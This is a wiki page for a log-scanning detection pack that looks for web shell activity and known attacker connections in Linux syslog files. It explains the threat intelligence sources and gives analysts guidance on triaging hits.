Linux Logs [0.1]
Suspicious log entries which may suggest web shell activity or attempted access from known malicious origins has been found.
This search aims to identify any activity within syslog files which may be indicative of webshell activity on the web server, or if specific known attackers have attempted to connect to the web server.
A webshell is a malicious webpage injected by an attacker onto a web server which is used to remotely access and launch further attacks.
This scan parses syslog files for any suspicious entries which may be indicative of attacker activity. This includes specific commands which are characteristic of a webshell. Many webshell variants exist, but can typically be characterised by the ability to be uploaded to a web server with the intent of remote access to establish, escalate or maintain persistence on a system.
This search looks for any files which may suggest the presence of web shells as identified within advisory 2020-008, using intelligence provided by the ACSC, and by other sources such as CyberCX and CrowdStrike and investigations. See the threat intelligence sources section below for further details.
Hits are derived from the intelligence provided, and do not consider environmental factors specific to your computer or network environment.
Packs.CyberCX.Linux.Logs
- Those provided by the ACSC 2020-008 report ‘Copy and Paste’ attacks, which are indicated as Traffic Light Protocol (TLP) White.
- Investigations performed by CyberCX
- Investigations performed by CrowdStrike
- Contributions from the community
Any hits identified may not indicate compromise on your system, but might be indicative of attacker activity. It is recommended to review each detection contextually to confirm if the hit is definitively malicious or a false positive. Guidance for how to approach these investigations is provided within this section.
This section provides general guidance on how to determine if the hit is indicative of malicious activity. Please note the specific detection results within the report generated by CCX Digger when conducting the investigation, as some of the content below may not be applicable for your system.
The entries identified should be investigated further to confirming the origin and context of the event.The following should be performed:
- Confirm that the behaviour is expected for the user's role and intended functionality, should a username be present
If the event was unexpected, or origin unknown, further action should be taken to determine what has been performed.
The following activities should be performed to determine if an attack may have occurred:
- Check to see if the event was successful.
- Identify any information that may have been returned, and investigate what that may relate to. This could include specific host details, user accounts, or directories.
- Conduct further investigation on the activity based on the command issued, or the connecting IP address, to determine if either are connected to any particular attacks, vulnerabilities, or attack groups.
If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.
[v0.1]:
